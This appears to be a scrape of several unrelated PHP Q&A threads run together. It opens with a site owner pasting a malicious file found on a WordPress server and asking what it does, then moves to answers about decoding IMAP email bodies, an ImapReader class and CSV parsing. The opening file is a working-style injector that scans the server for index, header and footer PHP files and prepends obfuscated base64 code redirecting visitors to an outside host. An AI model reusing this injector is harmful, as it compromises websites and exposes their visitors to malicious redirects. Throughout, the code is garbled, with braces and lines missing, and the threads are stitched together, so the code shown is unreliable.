[enter image description here][1]After an unsuccessful (atm) Brut-force attack our-commerce received yesterday.
Our WordPress WordFence found (image: https://i.stack.imgur.com/xfbbL.png) the file named 'lte_OFFLINE' it was located at the root directory. /public/lte_OFFLINE of a our server.
The File has already been quarantined/deleted.
No PHP background, and will need your kind assistance and knowledge to understand if this is a WordPress standard file or if not what does it do? or else, if can be recreated or not?
Note: I removed some code from the base64 ones replace them with ...
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
function strposa($haystack, $needle, $offset=0) {
if(!is_array($needle)) $needle = array($needle);
$stroke = "";
foreach($needle as $query) {
if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
return $stroke;
function make_work($f){
$g = file_get_contents($f);
if (strpos($g, 'WP_USE_THEMES') !== false) {
$g = base64_decode("...IHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwoKLyoqIExvYWRzIHRoZSBXb3JkUHJlc3MgRW52aXJvbm1lbnQgKi8kYT0iaCIuImVhIi4iZGVyIjskYShjaHIoNzYpLmNocigxMTEpLmNocig5OSkuY2hyKDk3KS5jaHIoMTE2KS5jaHIoMTA1KS5jaHIoMTExKS5jaHIoMTEwKS5jaHIoNTgpLmNocigzMikuY2hyKDEwNCkuY2hyKDExNikuY2hyKDExNikuY2hyKDExMikuY2hyKDExNSkuY2hyKDU4KS5jaHIoNDcpLmNocig0NykuY2hyKDEwNSkuY2hyKDExNCkuY2hyKDk5KS5jaHIoNDYpLmNocigxMDgpLmNocigxMTEpLmNocigxMTgpLmNocigxMDEpLmNocigxMDMpLmNocigxMTQpLmNocigxMDEpLmNocigxMDEpLmNocigxMTApLmNocigxMTIpLmNocigxMDEpLmNocigxMTApLmNocig5OSkuY2hyKDEwNSkuY2hyKDEwOCkuY2hyKDExNSkuY2hyKDQ2KS5jaHIoMTAzKS5jaHIoOTcpLmNocig0NykuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDEwMSkuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDYzKS5jaHIoMTA1KS5jaHIoMTAwKS5jaHIoNjEpLmNocig1MykuY2hyKDU2KS5jaHIoNTIpLmNocigzOCkuY2hyKDExNCkuY2hyKDExNSkuY2hyKDYxKS5jaHIoNTApKTsvKmFuZCBUZW1wbGF0ZSAqLwoKLy9yZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
#system('chmod 644 '.$f);
echo "trrrr::".$f;
} else {
$g = file_get_contents($f);
$g = base64_decode("...oMTEwKS5jaHIoMTEyKS5jaHIoMTAxKS5jaHIoMTEwKS5jaHIoOTkpLmNocigxMDUpLmNocigxMDgpLmNocigxMTUpLmNocig0NikuY2hyKDEwMykuY2hyKDk3KS5jaHIoNDcpLmNocigxMTQpLmNocigxMjEpLmNocigxMDEpLmNocigxMTQpLmNocigxMjEpLmNocig2MykuY2hyKDEwNSkuY2hyKDEwMCkuY2hyKDYxKS5jaHIoNTMpLmNocig1NikuY2hyKDUyKS5jaHIoMzgpLmNocigxMTQpLmNocigxMTUpLmNocig2MSkuY2hyKDUwKSk7Pz4=") . $g;
#system('chmod 644 '.$f);
echo "trrrr::".$f;[enter image description here][1]
$files = array();
$b = "/../../../../../../../../";
$l = "/";
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array ( 'php' );
$search = Array('index','head','foot');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
$q = strposa($file->getFilename(), $search);
if($q != ""){
foreach($files as $onefile) {
for ($i = 1; $i < 8; $i++) {
$l .= "../";
try {
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
$display = Array ( 'php' );
$search = Array('index','head','foot');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
$q = strposa($file->getFilename(), $search);
if($q != ""){
foreach($files as $onefile) {
} catch (Exception $e) {
I am using the PHP imap function to get emails from a POP3 mailbox and insert the data into a MySQL database.
Here is the PHP code:
$inbox = imap_open($hostname,$username,$password) or die('Cannot connect: ' . imap_last_error());
$emails = imap_search($inbox,'ALL');
$output = '';
foreach($emails as $email_number)
$from = $header->from[0]->mailbox . "#" . $header->from[0]->host;
$datetime=date("Y-m-d H:i:s",$header->udate);
//remove the " from the $toaddress
$toaddress = str_replace('"','',$toaddress);
echo '<strong>To:</strong> '.$toaddress.'<br>';
echo '<strong>From:</strong> '.$from.'<br>';
echo '<strong>Subject:</strong> '.$subject.'<br>';
//get message body
$message = (imap_fetchbody($inbox,$email_number,1.1));
if($message == '')
$message = (imap_fetchbody($inbox,$email_number,1));
It works fine, however on some emails in the body I get = in between words, or =20 in between words. And other times the emails will just be blank even though they are not blank when sent.
This only happens when coming from certain emails.
How can I get round this and just make the email completely plain text?
This happens because the emails are normally Quoted-printable encoded. The = is a soft line break and =20 is a white space. I think, you could use quoted_printable_decode() on the message so it shows correctly. About the blank emails, I don't know, I would need more details.
//get message body
$message = quoted_printable_decode(imap_fetchbody($inbox,$email_number,1.1));
$data = imap_fetchbody($this->imapStream, $Part->uid, $Part->path, FT_UID | FT_PEEK);
if ($Part->format === 'quoted-printable' && $data) {
$data = quoted_printable_decode($data);
This is required for mails with
Content-Transfer-Encoding: quoted-printable
But for mails with
Content-Transfer-Encoding: 8bit
simply imap_fetchbody is enough.
Above code was taken from a cake-php component created for fetching mails from mail boxes throgh IMAP.
I made an entire class some years ago, and I'm still using it when I need to get contents from emails. It will help you fetch all email bodies (sometimes you have html and plain text) in a readable format, and get all attached files, just ready to be saved somewhere or sent to a website user.
It is not really optimized so on a big mailbox you may have troubles; but the purpose of this class was to access emails in a readable format to put them on a widget of a website. I let you play with the sample below to get how it works.
ImapReader.class.php Here is the source code.
class ImapReader
private $host;
private $port;
private $user;
private $pass;
private $box;
private $box_list;
private $errors;
private $connected;
private $list;
private $deleted;
const FROM = 0;
const TO = 1;
const REPLY_TO = 2;
const SUBJECT = 3;
const CONTENT = 4;
const ATTACHMENT = 5;
public function __construct($host = null, $port = '143', $user = null, $pass = null)
$this->host = $host;
$this->port = $port;
$this->user = $user;
$this->pass = $pass;
$this->box = null;
$this->box_list = null;
$this->errors = array ();
$this->connected = false;
$this->list = null;
$this->deleted = false;
public function __destruct()
if ($this->isConnected())
public function changeServer($host = null, $port = '143', $user = null, $pass = null)
if ($this->isConnected())
$this->host = $host;
$this->port = $port;
$this->user = $user;
$this->pass = $pass;
$this->box_list = null;
$this->errors = array ();
$this->list = null;
return $this;
public function canConnect()
return (($this->connected == false) && (is_string($this->host)) && (!empty($this->host))
&& (is_numeric($this->port)) && ($this->port >= 1) && ($this->port <= 65535)
&& (is_string($this->user)) && (!empty($this->user)) && (is_string($this->pass)) && (!empty($this->pass)));
public function connect()
if ($this->canConnect())
$this->box = #imap_open("{{$this->host}:{$this->port}/imap/ssl/novalidate-cert}INBOX", $this->user,
if ($this->box !== false)
$this->errors = array_merge($this->errors, imap_errors());
return $this;
public function boxList()
if (is_null($this->box_list))
$list = imap_getsubscribed($this->box, "{{$this->host}:{$this->port}}", "*");
$this->box_list = array ();
foreach ($list as $box)
$this->box_list[] = $box->name;
return $this->box_list;
public function fetchAllHeaders($mbox)
if ($this->isConnected())
$test = imap_reopen($this->box, "{$mbox}");
if (!$test)
return false;
$num_msgs = imap_num_msg($this->box);
$this->list = array ();
for ($id = 1; ($id <= $num_msgs); $id++)
$this->list[] = $this->_fetchHeader($mbox, $id);
return true;
return false;
public function fetchSearchHeaders($mbox, $criteria)
if ($this->isConnected())
$test = imap_reopen($this->box, "{$mbox}");
if (!$test)
return false;
$msgs = imap_search($this->box, $criteria);
if ($msgs)
foreach ($msgs as $id)
$this->list[] = $this->_fetchHeader($mbox, $id);
return true;
return false;
public function isConnected()
return $this->connected;
public function disconnect()
if ($this->connected)
if ($this->deleted)
$this->deleted = false;
$this->connected = false;
$this->box = null;
return $this;
* Took from khigashi dot oang at gmail dot com at php.net
* with replacement of ereg family functions by preg's ones.
* #param string $str
* #return string
private function _fix($str)
if (preg_match("/=\?.{0,}\?[Bb]\?/", $str))
$str = preg_split("/=\?.{0,}\?[Bb]\?/", $str);
while (list($key, $value) = each($str))
if (preg_match("/\?=/", $value))
$arrTemp = preg_split("/\?=/", $value);
$arrTemp[0] = base64_decode($arrTemp[0]);
$str[$key] = join("", $arrTemp);
$str = join("", $str);
if (preg_match("/=\?.{0,}\?Q\?/", $str))
$str = quoted_printable_decode($str);
$str = preg_replace("/=\?.{0,}\?[Qq]\?/", "", $str);
$str = preg_replace("/\?=/", "", $str);
return trim($str);
private function _connected()
$this->connected = true;
return $this;
public function getErrors()
$errors = $this->errors;
$this->errors = array ();
return $errors;
public function count()
if (is_null($this->list))
return 0;
return count($this->list);
public function get($nbr = null)
if (is_null($nbr))
return $this->list;
if ((is_array($this->list)) && (isset($this->list[$nbr])))
return $this->list[$nbr];
return null;
public function fetch($nbr = null)
return $this->_callById('_fetch', $nbr);
private function _fetchHeader($mbox, $id)
$header = imap_header($this->box, $id);
if (!is_object($header))
$mail = new stdClass();
$mail->id = $id;
$mail->mbox = $mbox;
$mail->timestamp = (isset($header->udate)) ? ($header->udate) : ('');
$mail->date = date("d/m/Y H:i:s", (isset($header->udate)) ? ($header->udate) : (''));
$mail->from = $this->_fix(isset($header->fromaddress) ? ($header->fromaddress) : (''));
$mail->to = $this->_fix(isset($header->toaddress) ? ($header->toaddress) : (''));
$mail->reply_to = $this->_fix(isset($header->reply_toaddress) ? ($header->reply_toaddress) : (''));
$mail->subject = $this->_fix(isset($header->subject) ? ($header->subject) : (''));
$mail->content = array ();
$mail->attachments = array ();
$mail->deleted = false;
return $mail;
private function _fetch($mail)
$test = imap_reopen($this->box, "{$mail->mbox}");
if (!$test)
return $mail;
$structure = imap_fetchstructure($this->box, $mail->id);
if ((!isset($structure->parts)) || (!is_array($structure->parts)))
$body = imap_body($this->box, $mail->id);
$content = new stdClass();
$content->type = 'content';
$content->mime = $this->_fetchType($structure);
$content->charset = $this->_fetchParameter($structure->parameters, 'charset');
$content->data = $this->_decode($body, $structure->type);
$content->size = strlen($content->data);
$mail->content[] = $content;
return $mail;
$parts = $this->_fetchPartsStructureRoot($mail, $structure);
foreach ($parts as $part)
$content = new stdClass();
$content->type = null;
$content->data = null;
$content->mime = $this->_fetchType($part->data);
if ((isset($part->data->disposition))
&& ((strcmp('attachment', $part->data->disposition) == 0)
|| (strcmp('inline', $part->data->disposition) == 0)))
$content->type = $part->data->disposition;
$content->name = null;
if (isset($part->data->dparameters))
$content->name = $this->_fetchParameter($part->data->dparameters, 'filename');
if (is_null($content->name))
if (isset($part->data->parameters))
$content->name = $this->_fetchParameter($part->data->parameters, 'name');
$mail->attachments[] = $content;
else if ($part->data->type == 0)
$content->type = 'content';
$content->charset = null;
if (isset($part->data->parameters))
$content->charset = $this->_fetchParameter($part->data->parameters, 'charset');
$mail->content[] = $content;
$body = imap_fetchbody($this->box, $mail->id, $part->no);
if (isset($part->data->encoding))
$content->data = $this->_decode($body, $part->data->encoding);
$content->data = $body;
$content->size = strlen($content->data);
return $mail;
private function _fetchPartsStructureRoot($mail, $structure)
$parts = array ();
if ((isset($structure->parts)) && (is_array($structure->parts)) && (count($structure->parts) > 0))
foreach ($structure->parts as $key => $data)
$this->_fetchPartsStructure($mail, $data, ($key + 1), $parts);
return $parts;
private function _fetchPartsStructure($mail, $structure, $prefix, &$parts)
if ((isset($structure->parts)) && (is_array($structure->parts)) && (count($structure->parts) > 0))
foreach ($structure->parts as $key => $data)
$this->_fetchPartsStructure($mail, $data, $prefix . "." . ($key + 1), $parts);
$part = new stdClass;
$part->no = $prefix;
$part->data = $structure;
$parts[] = $part;
private function _fetchParameter($parameters, $key)
foreach ($parameters as $parameter)
if (strcmp($key, $parameter->attribute) == 0)
return $parameter->value;
return null;
private function _fetchType($structure)
$primary_mime_type = array ("TEXT", "MULTIPART", "MESSAGE", "APPLICATION", "AUDIO", "IMAGE", "VIDEO", "OTHER");
if ((isset($structure->subtype)) && ($structure->subtype) && (isset($structure->type)))
return $primary_mime_type[(int) $structure->type] . '/' . $structure->subtype;
return "TEXT/PLAIN";
private function _decode($message, $coding)
switch ($coding)
case 2:
$message = imap_binary($message);
case 3:
$message = imap_base64($message);
case 4:
$message = imap_qprint($message);
case 5:
return $message;
private function _callById($method, $data)
$callback = array ($this, $method);
// data is null
if (is_null($data))
$result = array ();
foreach ($this->list as $mail)
$result[] = $this->_callById($method, $mail);
return $result;
// data is an array
if (is_array($data))
$result = array ();
foreach ($data as $elem)
$result[] = $this->_callById($method, $elem);
return $result;
// data is an object
if ((is_object($data)) && ($data instanceof stdClass) && (isset($data->id)))
return call_user_func($callback, $data);
// data is numeric
if (($this->isConnected()) && (is_array($this->list)) && (is_numeric($data)))
foreach ($this->list as $mail)
if ($mail->id == $data)
return call_user_func($callback, $mail);
return null;
public function delete($nbr)
$this->_callById('_delete', $nbr);
private function _delete($mail)
if ($mail->deleted == false)
$test = imap_reopen($this->box, "{$mail->mbox}");
if ($test)
$this->deleted = true;
imap_delete($this->box, $mail->id);
$mail->deleted = true;
public function searchBy($pattern, $type)
$result = array ();
if (is_array($this->list))
foreach ($this->list as $mail)
$match = false;
switch ($type)
case self::FROM:
$match = $this->_match($mail->from, $pattern);
case self::TO:
$match = $this->_match($mail->to, $pattern);
case self::REPLY_TO:
$match = $this->_match($mail->reply_to, $pattern);
case self::SUBJECT:
$match = $this->_match($mail->subject, $pattern);
case self::CONTENT:
foreach ($mail->content as $content)
$match = $this->_match($content->data, $pattern);
if ($match)
case self::ATTACHMENT:
foreach ($mail->attachments as $attachment)
$match = $this->_match($attachment->name, $pattern);
if ($match)
if ($match)
$result[] = $mail;
return $result;
private function _nmatch($string, $pattern, $a, $b)
if ((!isset($string[$a])) && (!isset($pattern[$b])))
return 1;
if ((isset($pattern[$b])) && ($pattern[$b] == '*'))
if (isset($string[$a]))
return ($this->_nmatch($string, $pattern, ($a + 1), $b) + $this->_nmatch($string, $pattern, $a, ($b + 1)));
return ($this->_nmatch($string, $pattern, $a, ($b + 1)));
if ((isset($string[$a])) && (isset($pattern[$b])) && ($pattern[$b] == '?'))
return ($this->_nmatch($string, $pattern, ($a + 1), ($b + 1)));
if ((isset($string[$a])) && (isset($pattern[$b])) && ($pattern[$b] == '\\'))
if ((isset($pattern[($b + 1)])) && ($string[$a] == $pattern[($b + 1)]))
return ($this->_nmatch($string, $pattern, ($a + 1), ($b + 2)));
if ((isset($string[$a])) && (isset($pattern[$b])) && ($string[$a] == $pattern[$b]))
return ($this->_nmatch($string, $pattern, ($a + 1), ($b + 1)));
return 0;
private function _match($string, $pattern)
return $this->_nmatch($string, $pattern, 0, 0);
ImapReader.demo.php Here is the usage sample
$box = new ImapReader('example.com', '143', 'somebody#example.com', 'xxxxxxxxxxxx');
echo $box->count() . " emails in mailbox\n";
for ($i = 0; ($i < $box->count()); $i++)
$msg = $box->get($i);
echo "Reception date : {$msg->date}\n";
echo "From : {$msg->from}\n";
echo "To : {$msg->to}\n";
echo "Reply to : {$msg->from}\n";
echo "Subject : {$msg->subject}\n";
$msg = $box->fetch($msg);
echo "Number of readable contents : " . count($msg->content) . "\n";
foreach ($msg->content as $key => $content)
echo "\tContent " . ($key + 1) . " :\n";
echo "\t\tContent type : {$content->mime}\n";
echo "\t\tContent charset : {$content->charset}\n";
echo "\t\tContent size : {$content->size}\n";
echo "Number of attachments : " . count($msg->attachments) . "\n";
foreach ($msg->attachments as $key => $attachment)
echo "\tAttachment " . ($key + 1) . " :\n";
echo "\t\tAttachment type : {$attachment->type}\n";
echo "\t\tContent type : {$attachment->mime}\n";
echo "\t\tFile name : {$attachment->name}\n";
echo "\t\tFile size : {$attachment->size}\n";
echo "\n";
echo "Searching '*Bob*' ...\n";
$results = $box->searchBy('*Bob*', ImapReader::FROM);
foreach ($results as $result)
echo "\tMatched: {$result->from} - {$result->date} - {$result->subject}\n";
Regarding the blank emails, check the encoding of the mail.
If it is a binary encoded mail then you will get blank mails when you try to insert them into a mysql text field.
Try shifting every mail to UTF-8 and then insert it
iconv(mb_detect_encoding($mail_content, mb_detect_order(), true), "UTF-8", $mail_content);
function getmsg($mbox,$mid) {
// input $mbox = IMAP stream, $mid = message id
// output all the following:
global $charset,$htmlmsg,$plainmsg,$attachments;
$htmlmsg = $plainmsg = $charset = '';
$attachments = array();
$h = imap_header($mbox,$mid);
// add code here to get date, from, to, cc, subject...
$s = imap_fetchstructure($mbox,$mid);
if (!$s->parts) // simple
getpart($mbox,$mid,$s,0); // pass 0 as part-number
else { // multipart: cycle through each part
foreach ($s->parts as $partno0=>$p)
function getpart($mbox,$mid,$p,$partno) {
// $partno = '1', '2', '2.1', '2.1.3', etc for multipart, 0 if simple
global $htmlmsg,$plainmsg,$charset,$attachments;
$data = ($partno)?
imap_fetchbody($mbox,$mid,$partno): // multipart
imap_body($mbox,$mid); // simple
// Any part may be encoded, even plain text messages, so check everything.
if ($p->encoding==4)
$data = quoted_printable_decode($data);
elseif ($p->encoding==3)
$data = base64_decode($data);
// get all parameters, like charset, filenames of attachments, etc.
$params = array();
if ($p->parameters)
foreach ($p->parameters as $x)
$params[strtolower($x->attribute)] = $x->value;
if ($p->dparameters)
foreach ($p->dparameters as $x)
$params[strtolower($x->attribute)] = $x->value;
// Any part with a filename is an attachment,
// so an attached text file (type 0) is not mistaken as the message.
if ($params['filename'] || $params['name']) {
// filename may be given as 'Filename' or 'Name' or both
$filename = ($params['filename'])? $params['filename'] : $params['name'];
// filename may be encoded, so see imap_mime_header_decode()
$attachments[$filename] = $data; // this is a problem if two files have same name
if ($p->type==0 && $data) {
// Messages may be split in different parts because of inline attachments,
// so append parts together with blank row.
if (strtolower($p->subtype)=='plain')
$plainmsg. = trim($data) ."\n\n";
$htmlmsg. = $data ."<br><br>";
$charset = $params['charset']; // assume all parts are same charset
// Many bounce notifications embed the original message as type 2,
// but AOL uses type 1 (multipart), which is not handled here.
// There are no PHP functions to parse embedded messages,
// so this just appends the raw source to the main message.
elseif ($p->type==2 && $data) {
$plainmsg. = $data."\n\n";
if ($p->parts) {
foreach ($p->parts as $partno0=>$p2)
getpart($mbox,$mid,$p2,$partno.'.'.($partno0+1)); // 1.2, 1.2.1, etc.
Reference (First user contributed note): http://php.net/manual/en/function.imap-fetchstructure.php
I tried all this answers, but neither one worked for me. Then I hit first user contributed note on this PHP page:
and this works for all my cases. Quite old answer btw.
I'm Using this PHP IMAP Class: http://code.google.com/p/php-imap/source/browse/trunk/ImapMailbox.php on a current project. After a few modifications the class is working. However whenever the class downloads .docx files they are always corrupt and have to be recovered by office.
protected function initMailPart(IncomingMail $mail, $partStruct, $partNum) {
$data = $partNum ? $this->imap_fetchbody($this->mbox, $mail->mId, $partNum, FT_UID) : $this->imap_body($this->mbox, $mail->mId, FT_UID);
if($partStruct->encoding == 1) {
$data = $this->imap_utf8($data);
elseif($partStruct->encoding == 2) {
$data = $this->imap_binary($data);
elseif($partStruct->encoding == 3) {
$data = $this->imap_base64($data);
elseif($partStruct->encoding == 4) {
$data = $this->imap_qprint($data);
$data = trim($data);
$params = array();
if(!empty($partStruct->parameters)) {
foreach($partStruct->parameters as $param) {
$params[strtolower($param->attribute)] = $param->value;
if(!empty($partStruct->dparameters)) {
foreach($partStruct->dparameters as $param) {
$params[strtolower($param->attribute)] = $param->value;
if(!empty($params['charset'])) {
$data = iconv($params['charset'], $this->serverEncoding, $data);
// attachments
if($this->attachmentsDir) {
$filename = false;
$attachmentId = $partStruct->ifid ? trim($partStruct->id, " <>") : null;
if(empty($params['filename']) && empty($params['name']) && $attachmentId) {
$filename = $attachmentId . '.' . strtolower($partStruct->subtype);
elseif(!empty($params['filename']) || !empty($params['name'])) {
$filename = !empty($params['filename']) ? $params['filename'] : $params['name'];
$filename = $this->decodeMimeStr($filename);
$filename = $this->quoteAttachmentFilename($filename);
if($filename) {
if($this->attachmentsDir) {
$filepath = rtrim($this->attachmentsDir, '/\\') . DIRECTORY_SEPARATOR . $filename;
file_put_contents($filepath, $data);
$mail->attachments[$filename] = $filepath;
else {
$mail->attachments[$filename] = $filename;
if($attachmentId) {
$mail->attachmentsIds[$filename] = $attachmentId;
if($partStruct->type == 0 && $data) {
if(strtolower($partStruct->subtype) == 'plain') {
$mail->textPlain .= $data;
else {
$mail->textHtml .= $data;
elseif($partStruct->type == 2 && $data) {
$mail->textPlain .= trim($data);
if(!empty($partStruct->parts)) {
foreach($partStruct->parts as $subpartNum => $subpartStruct) {
$this->initMailPart($mail, $subpartStruct, $partNum . '.' . ($subpartNum + 1));
protected function decodeMimeStr($string, $charset = 'UTF-8') {
$newString = '';
$elements = $this->imap_mime_header_decode($string);
for($i = 0; $i < count($elements); $i++) {
if($elements[$i]->charset == 'default') {
$elements[$i]->charset = 'iso-8859-1';
$newString .= iconv($elements[$i]->charset, $charset, $elements[$i]->text);
return $newString;
Try wading into the binary files with a good editor, both before and after the round-trip from IMAP, to see if there's something obvious. I've had similar problems where whitespace made its way into the PHP script (e.g. at the end of a file after the close ?> tag); most formats won't blink but .docx may get kicked into a recovery if there's whitespace left over at the end.
I am trying to figure out a way to read a CSV with returns in it in PHP. The problem is when you read the file like this:
if (($handle = fopen($file, "r")) !== FALSE) {
while (($data = fgetcsv($handle, 1000, ",")) !== FALSE) {
row data...
If you have a retun in the CSV it does not work, it just sees the returns as a new row.
My idea was to have a regex to check for unclosed quotes, but I dont know of anything like that. Any ideas?
Since it seems the built-in fgetcsv does not correctly handle the CSV standard, there are suggestions for alternatives on the PHP man page for fgetcsv - here's one of them:
From http://www.php.net/manual/en/function.fgetcsv.php
The PHP's CSV handling stuff is
non-standard and contradicts with
RFC4180, thus fgetcsv() cannot
properly deal with files like this
example ...
There is a quick and dirty
RFC-compliant realization of CSV
creation and parsing:
function array_to_csvstring($items, $CSV_SEPARATOR = ';', $CSV_ENCLOSURE = '"', $CSV_LINEBREAK = "\n") {
$string = '';
$o = array();
foreach ($items as $item) {
if (stripos($item, $CSV_ENCLOSURE) !== false) {
$item = str_replace($CSV_ENCLOSURE, $CSV_ENCLOSURE . $CSV_ENCLOSURE, $item);
if ((stripos($item, $CSV_SEPARATOR) !== false)
|| (stripos($item, $CSV_ENCLOSURE) !== false)
|| (stripos($item, $CSV_LINEBREAK !== false))) {
$item = $CSV_ENCLOSURE . $item . $CSV_ENCLOSURE;
$o[] = $item;
$string = implode($CSV_SEPARATOR, $o) . $CSV_LINEBREAK;
return $string;
function csvstring_to_array(&$string, $CSV_SEPARATOR = ';', $CSV_ENCLOSURE = '"', $CSV_LINEBREAK = "\n") {
$o = array();
$cnt = strlen($string);
$esc = false;
$escesc = false;
$num = 0;
$i = 0;
while ($i < $cnt) {
$s = $string[$i];
if ($s == $CSV_LINEBREAK) {
if ($esc) {
$o[$num] .= $s;
} else {
} elseif ($s == $CSV_SEPARATOR) {
if ($esc) {
$o[$num] .= $s;
} else {
$esc = false;
$escesc = false;
} elseif ($s == $CSV_ENCLOSURE) {
if ($escesc) {
$o[$num] .= $CSV_ENCLOSURE;
$escesc = false;
if ($esc) {
$esc = false;
$escesc = true;
} else {
$esc = true;
$escesc = false;
} else {
if ($escesc) {
$o[$num] .= $CSV_ENCLOSURE;
$escesc = false;
$o[$num] .= $s;
// $string = substr($string, $i);
return $o;